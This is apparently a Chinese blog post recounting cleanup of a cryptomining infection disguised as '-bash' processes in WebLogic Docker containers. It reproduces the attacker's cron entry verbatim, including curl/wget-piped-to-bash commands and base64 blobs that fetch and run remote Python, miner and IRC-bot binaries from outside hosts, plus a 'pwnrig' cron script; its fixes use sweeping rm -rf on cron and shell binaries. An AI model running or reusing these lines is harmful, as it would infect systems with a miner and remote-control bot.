挖矿病毒-bash清理

问题描述

突然发现服务器的内存占用率非常高,经常超过90%。

使用htop查看进程,可以看到

 1  [|||||||||||||||||||||||||||||||100.0%]   Tasks: 169, 793 thr; 4 running
 2  [||                       2.0%]   Load average: 2.16 2.17 2.52 
 3  [|||||||||||||||||||||||||||||||||||||||||100.0%]   Uptime: 13 days, 16:02:59
 4  [|| ||||||||||||||||||||||13.0G/15.2G] Swp[            0K/0K]
  PID USER      PRI  NI  VIRT   RES   SHR S CPU% MEM%   TIME+  Command 
17839 root       20   0 2386M 2346M     4 S  0.0 15.1  0:00.61 -bash
17841 root	 20   0 2386M 2346M     4 S  0.0 15.1  0:00.55 -bash
17842 root	 20   0 2386M 2346M     4 S  0.0 15.1  0:00.54 -bash
17843 root	 20   0 2386M 2346M     4 S  0.0 15.1  0:00.54 -bash
17844 root	 20   0 2386M 2346M     4 S  0.0 15.1  0:00.55 -bash
 8099 root	 20   0 2386M 2346M     4 R 100. 15.1  6h53:51 -bash
 8100 root	 20   0 2386M 2346M     4 R 99.7 15.1  6h53:51 -bash
17835 root	 20   0 2386M 2346M     4 S 200. 15.1 13h48:44 -bash
28020 root	 20   0  112M  2208  1676 S  0.0  0.0  0:00.08 -bash

其中有好几个"-bash"程序

问题分析

应该是中了-bash挖矿病毒了

查看定时任务

crontal -e

*/10 * * * * root (curl -s http://dw.bpdeliver.ru/xms?cron || wget -q -O - http://dw.bpdeliver.ru/xms?cron || lwp-download http://dw.bpdeliver.ru/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly83Ny45MS44NC40Mi9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vNzcuOTEuODQuNDIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzc3LjkxLjg0LjQyLyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZDsgcm0gLXJmIC90bXAvaXJjZA== | base64 -d | bash -
##

执行bash命令

$ bash

bash
mkdir: cannot create directory '/var/tmp': File exists
mount: can't find /tmp in /etc/fstab
mount: can't find /var/tmp in /etc/fstab
bash: line 13: ufw: command not found
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
bash: line 18: chattr: command not found
nameserver 8.8.8.8
nameserver 8.8.4.4
bash: line 73: chattr: command not found
bash: line 74: chattr: command not found
Failed to get D-Bus connection: Operation not permitted
Configuration file /etc/systemd/system/linux-d.service is marked executable. Please remove executable permission bits. Proceeding anyway.
bash: line 142: chattr: command not found
bash: line 86: chattr: command not found
bash: line 87: /etc/cron.d/apache: Permission denied
bash: line 94: /var/spool/cron/crontabs/root: No such file or directory
bash: line 146: chattr: command not found
bash: line 42: chattr: command not found
bash: line 43: wget: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 2310k  100 2310k    0     0   851k      0  0:00:02  0:00:02 --:--:--  851k




bash: /tmp/xms: No such file or directory
^CTraceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 5, in <module>
KeyboardInterrupt
||  ERROR  || already running...
||  ERROR  || already running...
sh: line 1: -pwn: command not found
/tmp/ircd: line 1: a: No such file or directory

查看定时任务文件

目录/etc/cron.weekly和/etc/cron.daily以及/etc/cron.hourly下都有定时执行的脚本

vim /etc/cron.daily/pwnrig

#!/bin/bash
cp -f -r -- /bin/crondr /bin/-bash 2>/dev/null
cd /bin 2>/dev/null
./-bash -c  >/dev/null 2>&1
rm -rf -- -bash 2>/dev/null

解决方案

# 首先删除定时任务
$ crontab -e

# 删除定时文件
$ rm -rf /etc/cron.weekly/*  /etc/cron.daily/* /etc/cron.hourly/*

# 因为我这里用不到定时任务,执行删除程序
rm -rf /bin/crontab  /usr/sbin/crond  /usr/bin/crondr

# 删除bash
rm -rf /usr/bin/bash /usr/bin/sh
rm -rf /bin/bash  /bin/sh



# 然后从容器外部复制一个过来
docker cp /usr/bin/bash ts_weblogic12_smxb3:/usr/bin/
docker cp /bin/bash ts_weblogic12_smxb3:/bin/

docker cp /usr/bin/sh ts_weblogic12_smxb3:/usr/bin/
docker cp /bin/sh ts_weblogic12_smxb3:/bin/

杀死进程

 docker exec -it  ts_weblogic12_smxb3 sh
 pkill dbused

另一台

docker exec -it  ts-centos7-weblogic12-2  sh

# 删除定时文件
$ rm -rf /etc/cron.weekly/*  /etc/cron.daily/* /etc/cron.hourly/*

# 因为我这里用不到定时任务,执行删除程序
rm -rf /bin/crontab  /usr/sbin/crond  /usr/bin/crondr

# 删除bash
rm -rf /usr/bin/bash /usr/bin/sh
rm -rf /bin/bash  /bin/sh


docker cp /usr/bin/bash ts-centos7-weblogic12-2:/usr/bin/
docker cp /bin/bash ts-centos7-weblogic12-2:/bin/

docker cp /usr/bin/sh ts_weblogic12_smxb3:/usr/bin/
docker cp /bin/sh ts-centos7-weblogic12-2:/bin/

posted on 2023-11-29 11:09  没刮胡子  阅读(202)  评论(0)    收藏  举报

导航